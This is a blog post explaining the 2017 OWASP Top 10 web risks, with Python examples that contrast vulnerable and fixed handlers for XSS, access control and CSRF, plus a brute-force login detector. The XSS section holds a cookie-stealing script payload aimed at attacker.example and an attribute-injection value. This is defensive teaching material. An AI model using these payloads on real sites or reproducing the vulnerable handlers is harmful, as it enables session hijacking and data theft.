DRJ Blogs

DRJ | The premiere resource for business continuity and disaster recovery

OWASP Top 10 - Combating Data Security Breaches in Web Applications

Most organizations now develop and use web applications to do business online. This shift has undoubtedly made business easier, but it has also exposed critical business and customer data to security threats. The Verizon Data Breach Investigations Report (2017) found that a significant share of breaches involved web applications.

Many of these weaknesses can now be found by automated scanners, which provide robust detection for common classes of vulnerability. It is still important to understand the vulnerabilities themselves, however, before the danger they pose can be resolved; a scanner report is only useful to someone who knows what the finding means and how to fix it.

The Open Web Application Security Project (OWASP) is a community that produces security recommendations, specifications, and explanations in key areas. It began as a project to define testing standards for web application security. One lesson from that work is that buying dedicated software tools does not by itself make a web application immune to breaches; tools support, but do not replace, understanding and testing. In addition, OWASP drafted and published the 'Top 10' list of the most critical security risks for web applications.

The OWASP Top 10 soon established a benchmark for web application security. Since 2004 a new edition has been released roughly every three years. IT auditors across industries use it as a checklist when assessing the security of web applications. Integrating the Top 10 into the development process helps teams meet industry security compliance requirements and hardens applications against threat actors.

The following ten risks are from the 2017 list (the wording here matches the 2017 Release Candidate; the final 2017 edition replaced Insufficient Attack Protection, CSRF, and Unprotected APIs with XML External Entities, Insecure Deserialization, and Insufficient Logging and Monitoring):

Injection: Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query, as in SQL, OS command, and LDAP injection. The interpreter cannot distinguish the attacker's data from the developer's command, so the data changes what the command does.

Broken Authentication and Session Management: Stealing passwords or session tokens and then assuming legitimate users' identities are the most common security risks related to authentication and session management.

Cross-Site Scripting (XSS): An XSS vulnerability allows an attacker to inject malicious script into a website or web application, which is later executed in victims' browsers. Once the script runs it can hijack user sessions, deface websites, or redirect users to malicious sites.
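The defensive side of XSS is output encoding in the right context. The following is an added example, not code from the original article; the payload and the page fragments are constructed. It shows the same comment rendered unencoded and encoded, and an attribute value where quotes in particular must be encoded.

```python
import html

# Constructed attacker input (not from the original article): a script that
# would send the victim's cookies to an attacker-controlled host.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_comment_vulnerable(comment: str) -> str:
    """Untrusted text is placed into the HTML response unchanged. The browser
    parses the <script> element as code: stored or reflected XSS."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment: str) -> str:
    """HTML text-node context: encode & < > " ' as entities so the browser
    renders the payload as literal text instead of parsing it as markup."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


def render_attribute_vulnerable(title: str) -> str:
    """Attribute context without encoding: a value such as
    " onmouseover="alert(1)  closes the title attribute and adds a handler."""
    return '<a href="/profile" title="' + title + '">profile</a>'


def render_attribute_safe(title: str) -> str:
    """Attribute context done right: the value is quoted AND quotes inside it
    are encoded (quote=True), so the attacker cannot leave the attribute."""
    return '<a href="/profile" title="' + html.escape(title, quote=True) + '">profile</a>'


def contains_executable_markup(markup: str) -> bool:
    """Crude check used only in this demo: did a raw <script ...> tag or an
    unencoded event-handler attribute survive into the output?"""
    lowered = markup.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
```

Encoding rules differ by context (HTML body, attribute, JavaScript string, URL), so use the templating engine's context-aware escaping rather than hand-rolled string building; a Content-Security-Policy header and HttpOnly session cookies limit the damage when an encoding step is missed.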

Broken Access Control: Applications must enforce access control checks on the server each time a function or data object is accessed, not only by hiding options in the user interface. If requests are not verified server-side, attackers can forge requests to reach unauthorized functionality or other users' data.
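A server-side object-level check, as an added example (not from the original article): the `User` type, the invoice records, and the two handlers are constructed. The vulnerable handler only confirms that the caller is logged in, so any customer can read any invoice by changing the id in the URL; the safe handler applies an ownership rule on every request and returns the same response for "not yours" as for "does not exist".

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    user_id: int
    role: str  # "customer" or "admin"


# Constructed sample data (not from the original article): invoice id -> record.
INVOICES = {
    1001: {"owner": 7, "amount": 120.00},
    1002: {"owner": 8, "amount": 75.50},
    1003: {"owner": 7, "amount": 310.00},
}


def get_invoice_vulnerable(user: User, invoice_id: int) -> tuple:
    """Only checks that *someone* is logged in (a User was supplied).
    The GUI may list only the caller's own invoices, but nothing stops a
    logged-in attacker from requesting /invoices/1001 directly."""
    record = INVOICES.get(invoice_id)
    if record is None:
        return 404, None
    return 200, record


def can_read_invoice(user: User, record: dict) -> bool:
    """Authorization rule, evaluated on the server for every request:
    the record must belong to the caller, or the caller must be an admin."""
    return user.role == "admin" or record["owner"] == user.user_id


def get_invoice_safe(user: User, invoice_id: int) -> tuple:
    """Deny by default. A record that exists but is not the caller's gets the
    same 404 as a missing one, so an attacker cannot enumerate valid ids."""
    record = INVOICES.get(invoice_id)
    if record is None or not can_read_invoice(user, record):
        return 404, None
    return 200, record


if __name__ == "__main__":
    attacker = User(user_id=8, role="customer")
    print(get_invoice_vulnerable(attacker, 1001))  # leaks user 7's invoice
    print(get_invoice_safe(attacker, 1001))        # (404, None)
```

The check lives next to the data access, not in the view layer, so every code path that reaches the record passes through it.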

Security Misconfiguration: Good security requires a secure configuration defined and deployed for the application, its frameworks, the application server, web server, database server, and platform. A weakness in any of these layers can open the door to a serious breach.

Sensitive Data Exposure: Organizations should take a layered approach to protecting sensitive data such as credit card numbers, tax IDs, and authentication credentials. Threat actors can steal or modify data that is weakly protected. Encrypt such data in transit and at rest, and store passwords only as salted, deliberately slow hashes rather than in clear text or as a single fast hash.

Insufficient Attack Protection: Many web applications and APIs cannot detect, prevent, or respond to attacks, whether manual or automated. Applications should log authentication and input-validation failures, rate-limit or block abusive sources, and deploy patches quickly once a vulnerability is known.
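Detection and response for one common automated attack, credential stuffing, as an added example (not from the original article). The log format, the sample lines, and the thresholds are constructed; the detector counts failed logins per source IP in a sliding window and the response function turns each detection into a temporary block.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed authentication log lines (not from the original article).
LOG_LINES = [
    "2017-10-03T12:00:01+00:00 ip=198.51.100.7 user=alice result=FAIL",
    "2017-10-03T12:00:05+00:00 ip=203.0.113.5 user=alice result=FAIL",
    "2017-10-03T12:00:06+00:00 ip=203.0.113.5 user=bob result=FAIL",
    "2017-10-03T12:00:07+00:00 ip=203.0.113.5 user=carol result=FAIL",
    "2017-10-03T12:00:08+00:00 ip=203.0.113.5 user=dave result=FAIL",
    "2017-10-03T12:00:09+00:00 ip=203.0.113.5 user=erin result=FAIL",
    "2017-10-03T12:00:30+00:00 ip=198.51.100.7 user=alice result=FAIL",
    "2017-10-03T12:00:45+00:00 ip=198.51.100.7 user=alice result=OK",
    "2017-10-03T12:02:10+00:00 ip=203.0.113.5 user=frank result=FAIL",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def parse_line(line: str):
    """Return (timestamp, ip, user, result), or None for lines that do not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return datetime.fromisoformat(m["ts"]), m["ip"], m["user"], m["result"]


def detect_brute_force(lines, threshold: int = 5,
                       window: timedelta = timedelta(seconds=60)) -> dict:
    """Sliding-window detector: flag a source IP once it produces `threshold`
    failed logins inside `window`. Returns ip -> timestamp of first detection.
    One human mistyping a password a couple of times stays below the line;
    a script walking a credential list against many accounts does not."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, _user, result = parsed
        if result != "FAIL":
            continue
        recent = failures[ip]
        recent.append(ts)
        while recent and ts - recent[0] > window:   # expire old failures
            recent.popleft()
        if len(recent) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def respond(flagged: dict, block_for: timedelta = timedelta(minutes=15)) -> dict:
    """Automated response: a temporary block per source, ip -> block expiry."""
    return {ip: ts + block_for for ip, ts in flagged.items()}


if __name__ == "__main__":
    hits = detect_brute_force(LOG_LINES)
    print(hits)
    print(respond(hits))
```

In production the same logic runs against the real authentication log or inside the login handler itself, and the response feeds a rate limiter or WAF rather than a dictionary; the point is that the application notices the attack and acts, instead of serving unlimited guesses.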

Cross-Site Request Forgery (CSRF): A CSRF attack forces a logged-in victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application, which processes it as if the victim had intended it.
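The standard defence is a synchronizer token that a cross-site page cannot read. The following is an added example, not code from the original article; the session store, the request dictionaries, and the HMAC-bound token scheme are constructed for the demonstration. The browser attaches the session cookie to both requests; only the victim's own form carries the token.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; generated here for the demo, in practice loaded
# from a secrets store.
SERVER_SECRET = secrets.token_bytes(32)

# Constructed session store (not from the original article): cookie value -> user.
SESSIONS = {"sess-abc123": "alice"}


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session with an HMAC, so a token
    captured from one session is useless in another and nothing extra has
    to be stored server-side."""
    return hmac.new(SERVER_SECRET, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, submitted: str) -> bool:
    """Constant-time comparison against the expected token for this session."""
    if not submitted:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)


def transfer_vulnerable(request: dict) -> int:
    """Trusts the session cookie alone. The browser attaches that cookie to
    any request aimed at the site, including one a hostile page submits."""
    session_id = request.get("cookies", {}).get("session")
    if session_id not in SESSIONS:
        return 401
    return 200  # money moved


def transfer_safe(request: dict) -> int:
    """A state-changing request must also carry the per-session token, which
    a cross-site page cannot read and therefore cannot forge."""
    session_id = request.get("cookies", {}).get("session")
    if session_id not in SESSIONS:
        return 401
    if not verify_csrf_token(session_id, request.get("form", {}).get("csrf_token", "")):
        return 403
    return 200


def build_requests() -> dict:
    """Constructed requests: the victim's own form POST, and the same POST
    triggered from attacker.example, which carries the cookie but no token."""
    session_id = "sess-abc123"
    legit = {
        "cookies": {"session": session_id},
        "form": {"to": "bob", "amount": "100", "csrf_token": issue_csrf_token(session_id)},
    }
    forged = {
        "cookies": {"session": session_id},
        "form": {"to": "mallory", "amount": "9000"},
    }
    return {"legit": legit, "forged": forged}


if __name__ == "__main__":
    reqs = build_requests()
    print("vulnerable handler, forged request:", transfer_vulnerable(reqs["forged"]))
    print("safe handler, forged request:", transfer_safe(reqs["forged"]))
    print("safe handler, legitimate request:", transfer_safe(reqs["legit"]))
```

Setting `SameSite=Lax` or `Strict` on the session cookie and checking the `Origin` header add defence in depth, but the token check is what makes the handler correct on its own.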

Using Components with Known Vulnerabilities: Components such as libraries, frameworks, and other software modules almost always run with the same privileges as the application itself, so exploiting a vulnerable component can do serious damage. Applications that use such components undermine their own defenses and enable a range of attacks. Keep an inventory of dependencies and their versions, and track published vulnerabilities against it.

Unprotected APIs: Modern web applications expose a growing number of APIs over protocols such as SOAP/XML, REST/JSON, GWT, and RPC. These APIs are often left unprotected and may contain many vulnerabilities; they need the same authentication, authorization, and input validation as the user-facing parts of the application.

The OWASP Top 10 list helps teams build web applications that are considerably more secure. If these risks are considered early in development, the resulting products are far less likely to suffer a serious breach. There are also long-term benefits when this practice is absorbed into the Software Development Life Cycle (SDLC) and developers are trained to write code in line with the list.
